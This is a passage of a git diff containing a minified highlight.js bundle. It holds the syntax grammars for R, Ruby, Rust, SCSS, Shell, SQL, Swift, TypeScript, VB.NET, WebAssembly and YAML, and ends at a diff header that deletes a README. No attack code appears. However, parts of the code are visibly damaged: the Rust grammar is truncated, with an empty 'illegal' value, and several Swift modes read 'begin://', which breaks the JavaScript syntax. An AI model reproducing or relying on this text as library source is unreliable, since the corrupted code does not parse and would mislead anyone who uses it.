]|$)/},]},]}),grmr_r(e){let n=e.regex,t=/(?:(?:[a-zA-Z]|\.[._a-zA-Z])[._a-zA-Z0-9]*)|\.(?!\d)/,a=n.either(/0[xX][0-9a-fA-F]+\.[0-9a-fA-F]*[pP][+-]?\d+i?/,/0[xX][0-9a-fA-F]+(?:[pP][+-]?\d+)?[Li]?/,/(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?[Li]?/),i=/[=!<>:]=|\|\||&&|:::?|<-|<<-|->>|->|\|>|[-+*\/?!$&|:<=>@^~]|\*\*/,r=n.either(/[()]/,/[{}]/,/\[\[/,/[[\]]/,/\\/,/,/);return{name:"R",keywords:{$pattern:t,keyword:"function if in break next repeat else for while",literal:"NULL NA TRUE FALSE Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10",built_in:"LETTERS letters month.abb month.name pi T F abs acos acosh all any anyNA Arg as.call as.character as.complex as.double as.environment as.integer as.logical as.null.default as.numeric as.raw asin asinh atan atanh attr attributes baseenv browser c call ceiling class Conj cos cosh cospi cummax cummin cumprod cumsum digamma dim dimnames emptyenv exp expression floor forceAndCall gamma gc.time globalenv Im interactive invisible is.array is.atomic is.call is.character is.complex is.double is.environment is.expression is.finite is.function is.infinite is.integer is.language is.list is.logical is.matrix is.na is.name is.nan is.null is.numeric is.object is.pairlist is.raw is.recursive is.single is.symbol lazyLoadDBfetch length lgamma list log max min missing Mod names nargs nzchar oldClass on.exit pos.to.env proc.time prod quote range Re rep retracemem return round seq_along seq_len seq.int sign signif sin sinh sinpi sqrt standardGeneric substitute sum switch tan tanh tanpi tracemem trigamma trunc unclass untracemem UseMethod xtfrm"},contains:[e.COMMENT(/#'/,/$/,{contains:[{scope:"doctag",match:/@examples/,starts:{end:n.lookahead(n.either(/\n^#'\s*(?=@[a-zA-Z]+)/,/\n^(?!#')/)),endsParent:!0}},{scope:"doctag",begin:"@param",end:/$/,contains:[{scope:"variable",variants:[{match:t},{match:/`(?:\\.|[^`\\])+`/}],endsParent:!0},]},{scope:"doctag",match:/@[a-zA-Z]+/},{scope:"keyword",match:/\\[a-zA-Z]+/},]}),e.HASH_COMMENT_MODE,{scope:"string",contains:[e.BACKSLASH_ESCAPE],variants:[e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\(/,end:/\)(-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\{/,end:/\}(-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\[/,end:/\](-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\(/,end:/\)(-*)'/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\{/,end:/\}(-*)'/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\[/,end:/\](-*)'/}),{begin:'"',end:'"',relevance:0},{begin:"'",end:"'",relevance:0},]},{relevance:0,variants:[{scope:{1:"operator",2:"number"},match:[i,a]},{scope:{1:"operator",2:"number"},match:[/%[^%]*%/,a]},{scope:{1:"punctuation",2:"number"},match:[r,a]},{scope:{2:"number"},match:[/[^a-zA-Z0-9._]|^/,a]},]},{scope:{3:"operator"},match:[t,/\s+/,/<-/,/\s+/]},{scope:"operator",relevance:0,variants:[{match:i},{match:/%[^%]*%/},]},{scope:"punctuation",relevance:0,match:r},{begin:"`",end:"`",contains:[{begin:/\\./}]},]}},grmr_ruby(e){let n=e.regex,t="([a-zA-Z_]\\w*[!?=]?|[-+~]@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?)",a=n.either(/\b([A-Z]+[a-z0-9]+)+/,/\b([A-Z]+[a-z0-9]+)+[A-Z]+/),i=n.concat(a,/(::\w+)*/),r={"variable.constant":["__FILE__","__LINE__","__ENCODING__"],"variable.language":["self","super"],keyword:["alias","and","begin","BEGIN","break","case","class","defined","do","else","elsif","end","END","ensure","for","if","in","module","next","not","or","redo","require","rescue","retry","return","then","undef","unless","until","when","while","yield","include","extend","prepend","public","private","protected","raise","throw",],built_in:["proc","lambda","attr_accessor","attr_reader","attr_writer","define_method","private_constant","module_function",],literal:["true","false","nil"]},s={className:"doctag",begin:"@[A-Za-z]+"},l={begin:"#<",end:">"},o=[e.COMMENT("#","$",{contains:[s]}),e.COMMENT("^=begin","^=end",{contains:[s],relevance:10}),e.COMMENT("^__END__",e.MATCH_NOTHING_RE),],c={className:"subst",begin:/#\{/,end:/\}/,keywords:r},d={className:"string",contains:[e.BACKSLASH_ESCAPE,c],variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/`/,end:/`/},{begin:/%[qQwWx]?\(/,end:/\)/},{begin:/%[qQwWx]?\[/,end:/\]/},{begin:/%[qQwWx]?\{/,end:/\}/},{begin:/%[qQwWx]?/},{begin:/%[qQwWx]?\//,end:/\//},{begin:/%[qQwWx]?%/,end:/%/},{begin:/%[qQwWx]?-/,end:/-/},{begin:/%[qQwWx]?\|/,end:/\|/},{begin:/\B\?(\\\d{1,3})/},{begin:/\B\?(\\x[A-Fa-f0-9]{1,2})/},{begin:/\B\?(\\u\{?[A-Fa-f0-9]{1,6}\}?)/},{begin:/\B\?(\\M-\\C-|\\M-\\c|\\c\\M-|\\M-|\\C-\\M-)[\x20-\x7e]/},{begin:/\B\?\\(c|C-)[\x20-\x7e]/},{begin:/\B\?\\?\S/},{begin:n.concat(/<<[-~]?'?/,n.lookahead(/(\w+)(?=\W)[^\n]*\n(?:[^\n]*\n)*?\s*\1\b/)),contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,contains:[e.BACKSLASH_ESCAPE,c]}),]},]},g="[0-9](_?[0-9])*",u={className:"number",relevance:0,variants:[{begin:`\\b([1-9](_?[0-9])*|0)(\\.(${g}))?([eE][+-]?(${g})|r)?i?\\b`},{begin:"\\b0[dD][0-9](_?[0-9])*r?i?\\b"},{begin:"\\b0[bB][0-1](_?[0-1])*r?i?\\b"},{begin:"\\b0[oO][0-7](_?[0-7])*r?i?\\b"},{begin:"\\b0[xX][0-9a-fA-F](_?[0-9a-fA-F])*r?i?\\b"},{begin:"\\b0(_?[0-7])+r?i?\\b"},]},b={variants:[{match:/\(\)/},{className:"params",begin:/\(/,end:/(?=\))/,excludeBegin:!0,endsParent:!0,keywords:r},]},m=[d,{variants:[{match:[/class\s+/,i,/\s+<\s+/,i]},{match:[/\b(class|module)\s+/,i]},],scope:{2:"title.class",4:"title.class.inherited"},keywords:r},{match:[/(include|extend)\s+/,i],scope:{2:"title.class"},keywords:r},{relevance:0,match:[i,/\.new[. (]/],scope:{1:"title.class"}},{relevance:0,match:/\b[A-Z][A-Z_0-9]+\b/,className:"variable.constant"},{relevance:0,match:a,scope:"title.class"},{match:[/def/,/\s+/,t],scope:{1:"keyword",3:"title.function"},contains:[b]},{begin:e.IDENT_RE+"::"},{className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"(!|\\?)?:",relevance:0},{className:"symbol",begin:":(?!\\s)",contains:[d,{begin:t}],relevance:0},u,{className:"variable",begin:"(\\$\\W)|((\\$|@@?)(\\w+))(?=[^@$?])(?![A-Za-z])(?![@$?'])"},{className:"params",begin:/\|/,end:/\|/,excludeBegin:!0,excludeEnd:!0,relevance:0,keywords:r},{begin:"("+e.RE_STARTERS_RE+"|unless)\\s*",keywords:"unless",contains:[{className:"regexp",contains:[e.BACKSLASH_ESCAPE,c],illegal:/\n/,variants:[{begin:"/",end:"/[a-z]*"},{begin:/%r\{/,end:/\}[a-z]*/},{begin:"%r\\(",end:"\\)[a-z]*"},{begin:"%r!",end:"![a-z]*"},{begin:"%r\\[",end:"\\][a-z]*"},]},].concat(l,o),relevance:0},].concat(l,o);return c.contains=m,b.contains=m,o.unshift(l),{name:"Ruby",aliases:["rb","gemspec","podspec","thor","irb"],keywords:r,illegal:/\/\*/,contains:[e.SHEBANG({binary:"ruby"})].concat([{begin:/^\s*=>/,starts:{end:"$",contains:m}},{className:"meta.prompt",begin:"^([>?]>|[\\w#]+\\(\\w+\\):\\d+:\\d+[>*]|(\\w+-)?\\d+\\.\\d+\\.\\d+(p\\d+)?[^\\d][^>]+>)(?=[ ])",starts:{end:"$",keywords:r,contains:m}},]).concat(o).concat(m)}},grmr_rust(e){let n=e.regex,t={className:"title.function.invoke",relevance:0,begin:n.concat(/\b/,/(?!let\b)/,e.IDENT_RE,n.lookahead(/\s*\(/))},a="([ui](8|16|32|64|128|size)|f(32|64))?",i=["drop ","Copy","Send","Sized","Sync","Drop","Fn","FnMut","FnOnce","ToOwned","Clone","Debug","PartialEq","PartialOrd","Eq","Ord","AsRef","AsMut","Into","From","Default","Iterator","Extend","IntoIterator","DoubleEndedIterator","ExactSizeIterator","SliceConcatExt","ToString","assert!","assert_eq!","bitflags!","bytes!","cfg!","col!","concat!","concat_idents!","debug_assert!","debug_assert_eq!","env!","panic!","file!","format!","format_args!","include_bytes!","include_str!","line!","local_data_key!","module_path!","option_env!","print!","println!","select!","stringify!","try!","unimplemented!","unreachable!","vec!","write!","writeln!","macro_rules!","assert_ne!","debug_assert_ne!",],r=["i8","i16","i32","i64","i128","isize","u8","u16","u32","u64","u128","usize","f32","f64","str","char","bool","Box","Option","Result","String","Vec",];return{name:"Rust",aliases:["rs"],keywords:{$pattern:e.IDENT_RE+"!?",type:r,keyword:["abstract","as","async","await","become","box","break","const","continue","crate","do","dyn","else","enum","extern","false","final","fn","for","if","impl","in","let","loop","macro","match","mod","move","mut","override","priv","pub","ref","return","self","Self","static","struct","super","trait","true","try","type","typeof","unsafe","unsized","use","virtual","where","while","yield",],literal:["true","false","Some","None","Ok","Err"],built_in:i},illegal:""},t,]}},grmr_scss(e){let n=X(e),t="@[a-z-]+",a={className:"variable",begin:"(\\$[a-zA-Z-][a-zA-Z0-9_-]*)\\b",relevance:0};return{name:"SCSS",case_insensitive:!0,illegal:"[=/|']",contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,n.CSS_NUMBER_MODE,{className:"selector-id",begin:"#[A-Za-z0-9_-]+",relevance:0},{className:"selector-class",begin:"\\.[A-Za-z0-9_-]+",relevance:0},n.ATTRIBUTE_SELECTOR_MODE,{className:"selector-tag",begin:"\\b("+V.join("|")+")\\b",relevance:0},{className:"selector-pseudo",begin:":("+Y.join("|")+")"},{className:"selector-pseudo",begin:":(:)?("+ee.join("|")+")"},a,{begin:/\(/,end:/\)/,contains:[n.CSS_NUMBER_MODE]},n.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b"},{begin:"\\b(whitespace|wait|w-resize|visible|vertical-text|vertical-ideographic|uppercase|upper-roman|upper-alpha|underline|transparent|top|thin|thick|text|text-top|text-bottom|tb-rl|table-header-group|table-footer-group|sw-resize|super|strict|static|square|solid|small-caps|separate|se-resize|scroll|s-resize|rtl|row-resize|ridge|right|repeat|repeat-y|repeat-x|relative|progress|pointer|overline|outside|outset|oblique|nowrap|not-allowed|normal|none|nw-resize|no-repeat|no-drop|newspaper|ne-resize|n-resize|move|middle|medium|ltr|lr-tb|lowercase|lower-roman|lower-alpha|loose|list-item|line|line-through|line-edge|lighter|left|keep-all|justify|italic|inter-word|inter-ideograph|inside|inset|inline|inline-block|inherit|inactive|ideograph-space|ideograph-parenthesis|ideograph-numeric|ideograph-alpha|horizontal|hidden|help|hand|groove|fixed|ellipsis|e-resize|double|dotted|distribute|distribute-space|distribute-letter|distribute-all-lines|disc|disabled|default|decimal|dashed|crosshair|collapse|col-resize|circle|char|center|capitalize|break-word|break-all|bottom|both|bolder|bold|block|bidi-override|below|baseline|auto|always|all-scroll|absolute|table|table-cell)\\b"},{begin:/:/,end:/[;}{]/,relevance:0,contains:[n.BLOCK_COMMENT,a,n.HEXCOLOR,n.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,n.IMPORTANT,n.FUNCTION_DISPATCH,]},{begin:"@(page|font-face)",keywords:{$pattern:t,keyword:"@page @font-face"}},{begin:"@",end:"[{;]",returnBegin:!0,keywords:{$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")},contains:[{begin:t,className:"keyword"},{begin:/[a-z-]+(?=:)/,className:"attribute"},a,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,n.HEXCOLOR,n.CSS_NUMBER_MODE,]},n.FUNCTION_DISPATCH,]}},grmr_shell:e=>({name:"Shell Session",aliases:["console","shellsession"],contains:[{className:"meta.prompt",begin:/^\s{0,3}[/~\w\d[\]()@-]*[>%$#][ ]?/,starts:{end:/[^\\](?=\s*$)/,subLanguage:"bash"}},]}),grmr_sql(e){let n=e.regex,t=e.COMMENT("--","$"),a=["true","false","unknown"],i=["bigint","binary","blob","boolean","char","character","clob","date","dec","decfloat","decimal","float","int","integer","interval","nchar","nclob","national","numeric","real","row","smallint","time","timestamp","varchar","varying","varbinary",],r=["abs","acos","array_agg","asin","atan","avg","cast","ceil","ceiling","coalesce","corr","cos","cosh","count","covar_pop","covar_samp","cume_dist","dense_rank","deref","element","exp","extract","first_value","floor","json_array","json_arrayagg","json_exists","json_object","json_objectagg","json_query","json_table","json_table_primitive","json_value","lag","last_value","lead","listagg","ln","log","log10","lower","max","min","mod","nth_value","ntile","nullif","percent_rank","percentile_cont","percentile_disc","position","position_regex","power","rank","regr_avgx","regr_avgy","regr_count","regr_intercept","regr_r2","regr_slope","regr_sxx","regr_sxy","regr_syy","row_number","sin","sinh","sqrt","stddev_pop","stddev_samp","substring","substring_regex","sum","tan","tanh","translate","translate_regex","treat","trim","trim_array","unnest","upper","value_of","var_pop","var_samp","width_bucket",],s=["create table","insert into","primary key","foreign key","not null","alter table","add constraint","grouping sets","on overflow","character set","respect nulls","ignore nulls","nulls first","nulls last","depth first","breadth first",],l=r,o=["abs","acos","all","allocate","alter","and","any","are","array","array_agg","array_max_cardinality","as","asensitive","asin","asymmetric","at","atan","atomic","authorization","avg","begin","begin_frame","begin_partition","between","bigint","binary","blob","boolean","both","by","call","called","cardinality","cascaded","case","cast","ceil","ceiling","char","char_length","character","character_length","check","classifier","clob","close","coalesce","collate","collect","column","commit","condition","connect","constraint","contains","convert","copy","corr","corresponding","cos","cosh","count","covar_pop","covar_samp","create","cross","cube","cume_dist","current","current_catalog","current_date","current_default_transform_group","current_path","current_role","current_row","current_schema","current_time","current_timestamp","current_path","current_role","current_transform_group_for_type","current_user","cursor","cycle","date","day","deallocate","dec","decimal","decfloat","declare","default","define","delete","dense_rank","deref","describe","deterministic","disconnect","distinct","double","drop","dynamic","each","element","else","empty","end","end_frame","end_partition","end-exec","equals","escape","every","except","exec","execute","exists","exp","external","extract","false","fetch","filter","first_value","float","floor","for","foreign","frame_row","free","from","full","function","fusion","get","global","grant","group","grouping","groups","having","hold","hour","identity","in","indicator","initial","inner","inout","insensitive","insert","int","integer","intersect","intersection","interval","into","is","join","json_array","json_arrayagg","json_exists","json_object","json_objectagg","json_query","json_table","json_table_primitive","json_value","lag","language","large","last_value","lateral","lead","leading","left","like","like_regex","listagg","ln","local","localtime","localtimestamp","log","log10","lower","match","match_number","match_recognize","matches","max","member","merge","method","min","minute","mod","modifies","module","month","multiset","national","natural","nchar","nclob","new","no","none","normalize","not","nth_value","ntile","null","nullif","numeric","octet_length","occurrences_regex","of","offset","old","omit","on","one","only","open","or","order","out","outer","over","overlaps","overlay","parameter","partition","pattern","per","percent","percent_rank","percentile_cont","percentile_disc","period","portion","position","position_regex","power","precedes","precision","prepare","primary","procedure","ptf","range","rank","reads","real","recursive","ref","references","referencing","regr_avgx","regr_avgy","regr_count","regr_intercept","regr_r2","regr_slope","regr_sxx","regr_sxy","regr_syy","release","result","return","returns","revoke","right","rollback","rollup","row","row_number","rows","running","savepoint","scope","scroll","search","second","seek","select","sensitive","session_user","set","show","similar","sin","sinh","skip","smallint","some","specific","specifictype","sql","sqlexception","sqlstate","sqlwarning","sqrt","start","static","stddev_pop","stddev_samp","submultiset","subset","substring","substring_regex","succeeds","sum","symmetric","system","system_time","system_user","table","tablesample","tan","tanh","then","time","timestamp","timezone_hour","timezone_minute","to","trailing","translate","translate_regex","translation","treat","trigger","trim","trim_array","true","truncate","uescape","union","unique","unknown","unnest","update","upper","user","using","value","values","value_of","var_pop","var_samp","varbinary","varchar","varying","versioning","when","whenever","where","width_bucket","window","with","within","without","year","add","asc","collation","desc","final","first","last","view",].filter(e=>!r.includes(e)),c={begin:n.concat(/\b/,n.either(...l),/\s*\(/),relevance:0,keywords:{built_in:l}};return{name:"SQL",case_insensitive:!0,illegal:/[{}]|<\//,keywords:{$pattern:/\b[\w\.]+/,keyword:((e,{exceptions:n,when:t}={})=>{let a=t;return n=n||[],e.map(e=>e.match(/\|\d+$/)||n.includes(e)?e:a(e)?e+"|0":e)})(o,{when:e=>e.length<3}),literal:a,type:i,built_in:["current_catalog","current_date","current_default_transform_group","current_path","current_role","current_schema","current_transform_group_for_type","current_user","session_user","system_time","system_user","current_time","localtime","current_timestamp","localtimestamp",]},contains:[{begin:n.either(...s),relevance:0,keywords:{$pattern:/[\w\.]+/,keyword:o.concat(s),literal:a,type:i}},{className:"type",begin:n.either("double precision","large object","with timezone","without timezone")},c,{className:"variable",begin:/@[a-z0-9]+/},{className:"string",variants:[{begin:/'/,end:/'/,contains:[{begin:/''/}]},]},{begin:/"/,end:/"/,contains:[{begin:/""/},]},e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE,t,{className:"operator",begin:/[-+*/=%^~]|&&?|\|\|?|!=?|<(?:=>?|<|>)?|>[>=]?/,relevance:0},]}},grmr_swift(e){let n={match:/\s+/,relevance:0},t=e.COMMENT("/\\*","\\*/",{contains:["self"]}),a=[e.C_LINE_COMMENT_MODE,t],i={match:[/\./,p(...e8,...eh)],className:{2:"keyword"}},r={match:m(/\./,p(...eE)),relevance:0},s=eE.filter(e=>"string"==typeof e).concat(["_|0"]),l={variants:[{className:"keyword",match:p(...eE.filter(e=>"string"!=typeof e).concat(ef).map(ep),...eh)},]},o={$pattern:p(/\b\w+/,/#\w+/),keyword:s.concat(eN),literal:e$},c=[i,r,l],d=[{match:m(/\./,p(...ew)),relevance:0},{className:"built_in",match:m(/\b/,p(...ew),/(?=\()/)},],u={match:/->/,relevance:0},b=[u,{className:"operator",relevance:0,variants:[{match:ek},{match:`\\.(\\.|${ex})+`}]},],h="([0-9a-fA-F]_*)+",f={className:"number",relevance:0,variants:[{match:"\\b(([0-9]_*)+)(\\.(([0-9]_*)+))?([eE][+-]?(([0-9]_*)+))?\\b"},{match:`\\b0x(${h})(\\.(${h}))?([pP][+-]?(([0-9]_*)+))?\\b`},{match:/\b0o([0-7]_*)+\b/},{match:/\b0b([01]_*)+\b/},]},E=(e="")=>({className:"subst",variants:[{match:m(/\\/,e,/[0\\tnr"']/)},{match:m(/\\/,e,/u\{[0-9a-fA-F]{1,8}\}/)},]}),$=(e="")=>({className:"subst",match:m(/\\/,e,/[\t ]*(?:[\r\n]|\r\n)/)}),y=(e="")=>({className:"subst",label:"interpol",begin:m(/\\/,e,/\(/),end:/\)/}),N=(e="")=>({begin:m(e,/"""/),end:m(/"""/,e),contains:[E(e),$(e),y(e)]}),w=(e="")=>({begin:m(e,/"/),end:m(/"/,e),contains:[E(e),y(e)]}),v={className:"string",variants:[N(),N("#"),N("##"),N("###"),w(),w("#"),w("##"),w("###"),]},x={match:m(/`/,eS,/`/)},k=[x,{className:"variable",match:/\$\d+/},{className:"variable",match:`\\$${eO}+`},],M=[{match:/(@|#(un)?)available/,className:"keyword",starts:{contains:[{begin:/\(/,end:/\)/,keywords:eT,contains:[...b,f,v]},]}},{className:"keyword",match:m(/@/,p(...eC))},{className:"meta",match:m(/@/,eS)},],O={match:g(/\b[A-Z]/),relevance:0,contains:[{className:"type",match:m(/(AV|CA|CF|CG|CI|CL|CM|CN|CT|MK|MP|MTK|MTL|NS|SCN|SK|UI|WK|XC)/,eO,"+")},{className:"type",match:eA,relevance:0},{match:/[?!]+/,relevance:0},{match:/\.\.\./,relevance:0},{match:m(/\s+&\s+/,g(eA)),relevance:0},]};O.contains.push({begin://,keywords:o,contains:[...a,...c,...M,u,O]});let S={begin:/\(/,end:/\)/,relevance:0,keywords:o,contains:["self",{match:m(eS,/\s*:/),keywords:"_|0",relevance:0},...a,...c,...d,...b,f,v,...k,...M,O,]},A={begin://,contains:[...a,O]},C={begin:/\(/,end:/\)/,keywords:o,contains:[{begin:p(g(m(eS,/\s*:/)),g(m(eS,/\s+/,eS,/\s*:/))),end:/:/,relevance:0,contains:[{className:"keyword",match:/\b_\b/},{className:"params",match:eS},]},...a,...c,...b,f,v,...M,O,S,],endsParent:!0,illegal:/["']/},T={match:[/func/,/\s+/,p(x.match,eS,ek)],className:{1:"keyword",3:"title.function"},contains:[A,C,n],illegal:[/\[/,/%/]};for(let R of v.variants){let D=R.contains.find(e=>"interpol"===e.label);D.keywords=o;let I=[...c,...d,...b,f,v,...k];D.contains=[...I,{begin:/\(/,end:/\)/,contains:["self",...I]},]}return{name:"Swift",keywords:o,contains:[...a,T,{match:[/\b(?:subscript|init[?!]?)/,/\s*(?=[<(])/],className:{1:"keyword"},contains:[A,C,n],illegal:/\[|%/},{beginKeywords:"struct protocol class extension enum actor",end:"\\{",excludeEnd:!0,keywords:o,contains:[e.inherit(e.TITLE_MODE,{className:"title.class",begin:/[A-Za-z$_][\u00C0-\u02B80-9A-Za-z$_]*/}),...c,]},{match:[/operator/,/\s+/,ek],className:{1:"keyword",3:"title"}},{begin:[/precedencegroup/,/\s+/,eA],className:{1:"keyword",3:"title"},contains:[O],keywords:[...ey,...e$],end:/}/},{beginKeywords:"import",end:/$/,contains:[...a],relevance:0},...c,...d,...b,f,v,...k,...M,O,S,]}},grmr_typescript(e){let n=em(e),t=["any","void","number","boolean","string","object","never","symbol","bigint","unknown",],a={beginKeywords:"namespace",end:/\{/,excludeEnd:!0,contains:[n.exports.CLASS_REFERENCE]},i={beginKeywords:"interface",end:/\{/,excludeEnd:!0,keywords:{keyword:"interface extends",built_in:t},contains:[n.exports.CLASS_REFERENCE]},r={$pattern:es,keyword:el.concat(["type","namespace","interface","public","private","protected","implements","declare","abstract","readonly","enum","override",]),literal:eo,built_in:eb.concat(t),"variable.language":eu},s={className:"meta",begin:"@[A-Za-z$_][0-9A-Za-z$_]*"},l=(e,n,t)=>{let a=e.contains.findIndex(e=>e.label===n);if(-1===a)throw Error("can not find mode to replace");e.contains.splice(a,1,t)};return Object.assign(n.keywords,r),n.exports.PARAMS_CONTAINS.push(s),n.contains=n.contains.concat([s,a,i]),l(n,"shebang",e.SHEBANG()),l(n,"use_strict",{className:"meta",relevance:10,begin:/^\s*['"]use strict['"]/}),n.contains.find(e=>"func.def"===e.label).relevance=0,Object.assign(n,{name:"TypeScript",aliases:["ts","tsx"]}),n},grmr_vbnet(e){let n=e.regex,t=/\d{1,2}\/\d{1,2}\/\d{4}/,a=/\d{4}-\d{1,2}-\d{1,2}/,i=/(\d|1[012])(:\d+){0,2} *(AM|PM)/,r=/\d{1,2}(:\d{1,2}){1,2}/,s={className:"literal",variants:[{begin:n.concat(/# */,n.either(a,t),/ *#/)},{begin:n.concat(/# */,r,/ *#/)},{begin:n.concat(/# */,i,/ *#/)},{begin:n.concat(/# */,n.either(a,t),/ +/,n.either(i,r),/ *#/)},]},l=e.COMMENT(/'''/,/$/,{contains:[{className:"doctag",begin:/<\/?/,end:/>/}]}),o=e.COMMENT(null,/$/,{variants:[{begin:/'/},{begin:/([\t ]|^)REM(?=\s)/}]});return{name:"Visual Basic .NET",aliases:["vb"],case_insensitive:!0,classNameAliases:{label:"symbol"},keywords:{keyword:"addhandler alias aggregate ansi as async assembly auto binary by byref byval call case catch class compare const continue custom declare default delegate dim distinct do each equals else elseif end enum erase error event exit explicit finally for friend from function get global goto group handles if implements imports in inherits interface into iterator join key let lib loop me mid module mustinherit mustoverride mybase myclass namespace narrowing new next notinheritable notoverridable of off on operator option optional order overloads overridable overrides paramarray partial preserve private property protected public raiseevent readonly redim removehandler resume return select set shadows shared skip static step stop structure strict sub synclock take text then throw to try unicode until using when where while widening with withevents writeonly yield",built_in:"addressof and andalso await directcast gettype getxmlnamespace is isfalse isnot istrue like mod nameof new not or orelse trycast typeof xor cbool cbyte cchar cdate cdbl cdec cint clng cobj csbyte cshort csng cstr cuint culng cushort",type:"boolean byte char date decimal double integer long object sbyte short single string uinteger ulong ushort",literal:"true false nothing"},illegal:"//|\\{|\\}|endif|gosub|variant|wend|^\\$ ",contains:[{className:"string",begin:/"(""|[^/n])"C\b/},{className:"string",begin:/"/,end:/"/,illegal:/\n/,contains:[{begin:/""/}]},s,{className:"number",relevance:0,variants:[{begin:/\b\d[\d_]*((\.[\d_]+(E[+-]?[\d_]+)?)|(E[+-]?[\d_]+))[RFD@!#]?/},{begin:/\b\d[\d_]*((U?[SIL])|[%&])?/},{begin:/&H[\dA-F_]+((U?[SIL])|[%&])?/},{begin:/&O[0-7_]+((U?[SIL])|[%&])?/},{begin:/&B[01_]+((U?[SIL])|[%&])?/},]},{className:"label",begin:/^\w+:/},l,o,{className:"meta",begin:/[\t ]*#(const|disable|else|elseif|enable|end|externalsource|if|region)\b/,end:/$/,keywords:{keyword:"const disable else elseif enable end externalsource if region then"},contains:[o]},]}},grmr_wasm(e){e.regex;let n=e.COMMENT(/\(;/,/;\)/);return n.contains.push("self"),{name:"WebAssembly",keywords:{$pattern:/[\w.]+/,keyword:["anyfunc","block","br","br_if","br_table","call","call_indirect","data","drop","elem","else","end","export","func","global.get","global.set","local.get","local.set","local.tee","get_global","get_local","global","if","import","local","loop","memory","memory.grow","memory.size","module","mut","nop","offset","param","result","return","select","set_global","set_local","start","table","tee_local","then","type","unreachable",]},contains:[e.COMMENT(/;;/,/$/),n,{match:[/(?:offset|align)/,/\s*/,/=/],className:{1:"keyword",3:"operator"}},{className:"variable",begin:/\$[\w_]+/},{match:/(\((?!;)|\))+/,className:"punctuation",relevance:0},{begin:[/(?:func|call|call_indirect)/,/\s+/,/\$[^\s)]+/],className:{1:"keyword",3:"title.function"}},e.QUOTE_STRING_MODE,{match:/(i32|i64|f32|f64)(?!\.)/,className:"type"},{className:"keyword",match:/\b(f32|f64|i32|i64)(?:\.(?:abs|add|and|ceil|clz|const|convert_[su]\/i(?:32|64)|copysign|ctz|demote\/f64|div(?:_[su])?|eqz?|extend_[su]\/i32|floor|ge(?:_[su])?|gt(?:_[su])?|le(?:_[su])?|load(?:(?:8|16|32)_[su])?|lt(?:_[su])?|max|min|mul|nearest|neg?|or|popcnt|promote\/f32|reinterpret\/[fi](?:32|64)|rem_[su]|rot[lr]|shl|shr_[su]|store(?:8|16|32)?|sqrt|sub|trunc(?:_[su]\/f(?:32|64))?|wrap\/i64|xor))\b/},{className:"number",relevance:0,match:/[+-]?\b(?:\d(?:_?\d)*(?:\.\d(?:_?\d)*)?(?:[eE][+-]?\d(?:_?\d)*)?|0x[\da-fA-F](?:_?[\da-fA-F])*(?:\.[\da-fA-F](?:_?[\da-fA-D])*)?(?:[pP][+-]?\d(?:_?\d)*)?)\b|\binf\b|\bnan(?::0x[\da-fA-F](?:_?[\da-fA-D])*)?\b/},]}},grmr_yaml(e){let n="true false yes no null",t="[\\w#;/?:@&=+$,.~*'()[\\]]+",a={className:"string",relevance:0,variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/\S+/},],contains:[e.BACKSLASH_ESCAPE,{className:"template-variable",variants:[{begin:/\{\{/,end:/\}\}/},{begin:/%\{/,end:/\}/},]},]},i=e.inherit(a,{variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/[^\s,{}[\]]+/},]}),r={end:",",endsWithParent:!0,excludeEnd:!0,keywords:n,relevance:0},s=[{className:"attr",variants:[{begin:"\\w[\\w :\\/.-]*:(?=[ ]|$)"},{begin:'"\\w[\\w :\\/.-]*":(?=[ ]|$)'},{begin:"'\\w[\\w :\\/.-]*':(?=[ ]|$)"},]},{className:"meta",begin:"^---\\s*$",relevance:10},{className:"string",begin:"[\\|>]([1-9]?[+-])?[ ]*\\n( +)[^ ][^\\n]*\\n(\\2[^\\n]+\\n?)*"},{begin:"<%[%=-]?",end:"[%-]?%>",subLanguage:"ruby",excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:"!\\w+!"+t},{className:"type",begin:"!<"+t+">"},{className:"type",begin:"!"+t},{className:"type",begin:"!!"+t},{className:"meta",begin:"&"+e.UNDERSCORE_IDENT_RE+"$"},{className:"meta",begin:"\\*"+e.UNDERSCORE_IDENT_RE+"$"},{className:"bullet",begin:"-(?=[ ]|$)",relevance:0},e.HASH_COMMENT_MODE,{beginKeywords:n,keywords:{literal:n}},{className:"number",begin:"\\b[0-9]{4}(-[0-9][0-9]){0,2}([Tt \\t][0-9][0-9]?(:[0-9][0-9]){2})?(\\.[0-9]*)?([ \\t])*(Z|[-+][0-9][0-9]?(:[0-9][0-9])?)?\\b"},{className:"number",begin:e.C_NUMBER_RE+"\\b",relevance:0},{begin:/\{/,end:/\}/,contains:[r],illegal:"\\n",relevance:0},{begin:"\\[",end:"\\]",contains:[r],illegal:"\\n",relevance:0},a,],l=[...s];return l.pop(),l.push(i),r.contains=l,{name:"YAML",case_insensitive:!0,aliases:["yml"],contains:s}}});let eD=Q;for(let eI of Object.keys(eR)){let eL=eI.replace("grmr_","").replace("_","-");eD.registerLanguage(eL,eR[eI])}return eD}();"object"==typeof exports&&"undefined"!=typeof module&&(module.exports=hljs); \ No newline at end of file diff --git a/spaces/mrtimmydontplay/api/README.md b/spaces/mrtimmydontplay/api/README.md deleted file mode 100644 index 